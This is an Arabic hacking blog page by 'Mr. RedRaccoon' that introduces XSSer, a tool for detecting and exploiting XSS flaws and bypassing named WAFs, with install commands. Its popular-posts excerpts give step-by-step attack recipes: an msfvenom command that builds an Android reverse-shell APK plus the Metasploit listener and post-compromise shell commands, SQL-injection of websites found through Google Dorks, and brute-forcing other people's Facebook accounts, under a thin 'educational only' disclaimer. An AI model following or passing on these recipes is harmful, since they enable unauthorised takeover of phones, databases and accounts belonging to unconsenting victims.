أداة Cross Site Scripter (XSSer): اكتشاف واستغلال ثغرات XSS تلقائيًا

 Mr. RedRaccoon

XSSer هي إطار عمل أوتوماتيكي مصمم لاكتشاف واستغلال ثغرات XSS (Cross-Site Scripting) في التطبيقات الويب، بالإضافة إلى تقديم تقارير حولها. تتيح الأداة العديد من الخيارات لتجاوز الفلاتر الأمنية باستخدام تقنيات حقن كود خاصة.

الميزات:

  • تحتوي على أكثر من 1300 نوع من متجهات الهجوم المخصصة لـ XSS.
  • القدرة على تجاوز واستغلال الكود على عدة متصفحات وجدران حماية للتطبيقات (WAFs) مثل:
    • PHPIDS: PHP-IDS
    • Imperva: Imperva Incapsula WAF
    • WebKnight: WebKnight WAF
    • F5: F5 Big IP WAF
    • Barracuda: Barracuda WAF
    • ModSec: Mod-Security
    • QuickDF: QuickDefense
    • Sucuri: SucuriWAF
    • Chrome: متصفح Google Chrome
    • IE: Internet Explorer
    • Firefox: متصفح Firefox
    • Netscape: Netscape مع وضعية عرض IE وGecko
    • Opera: متصفح Opera

التثبيت:

لتشغيل XSSer، تحتاج إلى Python (إصدار 3.x) وبعض المكتبات المطلوبة.

على أنظمة Debian مثل Ubuntu:

bsudo apt-get install python3-pycurl python3-bs4 python3-geoip python3-gi python3-cairocffi python3-selenium firefoxdriver

على أنظمة أخرى مثل Kali, Ubuntu, ArchLinux, ParrotSec, Fedora:

sudo pip3 install pycurl bs4 pygeoip gobject cairocffi selenium $

تعليقات

إرسال تعليق

Thankyou.

المشاركات الشائعة من هذه المدونة

كيفية إنشاء Payload ملغم واستخدام Metasploit

صورة
Mr.  RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...
قراءة المزيد

كيفية اختراق موقع ويب باستخدام Termux

صورة
Mr.  RedRaccoon الخطوة الأولى: تحديث النظام وتثبيت الأدوات اللازمة تحديث النظام وتثبيت الأدوات: افتح Termux وأدخل الأوامر التالية: $ apt update && apt upgrade $ pkg install python2 $ pkg install git تثبيت Termux-LazySQLMap: أدخل الأوامر التالية لتثبيت الأداة: $ git clone https://github.com/verluchie/termux-lazysqlmap $ cd termux-lazysqlmap $ chmod 777 install.sh $ ./install.sh الخطوة الثانية: استخدام Google Dorks للعثور على مواقع الويب استخدم Google Dorks للعثور على مواقع الويب الضعيفة التي يمكنك اختبارها. (لمزيد من المعلومات حول Google Dorks، يمكنك البحث عن كيفية استخدامها). الخطوة الثالثة: تنفيذ الاختراق باستخدام Termux-LazySQLMap تشغيل الأداة: بعد تثبيت Termux-LazySQLMap، ابدأ الأداة بكتابة الأمر التالي في Termux: $ lazysqlmap اختيار الموقع المستهدف: أدخل عنوان الموقع الذي تريد اختراقه عندما يُطلب منك ذلك. اختيار خيارات التحقق: اختر الخيار المناسب لك. على سبيل المثال، اختر الخيار الذي يعود بالجداول في قاعدة البيانات. استرجاع الجداول: استخدم الأمر sitedb لاسترجاع الجد...
قراءة المزيد

كيفية اختراق حساب فيسبوك باستخدام Termux

صورة
Mr.  RedRaccoon ملاحظة: يجب أن تكون على علم بأن استخدام الأدوات والبرمجيات لاختراق الحسابات بدون إذن هو غير قانوني وغير أخلاقي. الهدف من هذا الشرح هو توضيح كيفية عمل الأدوات لأغراض تعليمية فقط. يجب عليك دائمًا احترام خصوصية الآخرين والامتثال للقوانين المحلية. إليك خطوات استخدام Termux لاختراق حساب فيسبوك عبر التخمين: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات المطلوبة: apt update && apt upgrade $ $ pkg install git $ pkg install python $ pkg install python2 تثبيت سكربت التخمين: قم بتحميل السكربت من GitHub باستخدام الأوامر التالية: $git clone https://github.com/hackermohamedPro/Aliens-fb $ $ cd Aliens-fb $ pip2 install mechanize إنشاء قائمة كلمات المرور: قم بتشغيل السكربت لإنشاء قائمة كلمات مرور: $python Aliens-list.py عند تشغيل السكربت، سيُطلب منك إدخال اسم لقائمة كلمات المرور، تأكد من استخدام تنسيق .txt مثل passwords.txt . املأ القائمة بكلمات المرور المحتملة، ثم اكتب Pro واضغط على Enter . تشغيل أداة التخمين: ...
قراءة المزيد